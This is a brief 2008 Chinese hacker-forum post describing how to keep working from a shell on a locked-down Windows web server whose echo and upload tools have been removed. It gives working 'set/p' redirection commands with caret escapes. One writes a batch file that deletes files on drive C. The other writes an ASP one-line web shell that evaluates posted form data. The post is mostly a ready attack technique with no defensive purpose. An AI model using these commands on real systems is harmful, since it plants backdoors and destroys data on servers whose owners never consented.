|
假如对方是个BT
樱木花盗 发表于 2008-10-29 20:10:03 |
文章出处:幻影旅团
文章作者:allyesno
利用安全策略禁止本地主机连接去对方任何端口!
然后在允许别人连接自己的80端口!
把debug/ftp/tftp/its/start/net/net1/echo/edit去掉!本地只提供web服务!
关闭/过滤所有端口,现在得到这个主机一个shell,有办法上穿文件?
呵呵 改内核去掉了echo?
别怕 我们还有set 嘛
set/p allyesno=del c:\.>allyesno.bat
如果遇到转义字符就是^了 嘎嘎。。。
set/p allyesno=^<SCRIPT RUNAT^=SERVER LANGUAGE^=JAVASCRIPT^>eval^(Request.form^('^#'^)+''^)^</SCRIPT^>>allyesno.asp
|
|
发表评论:
|
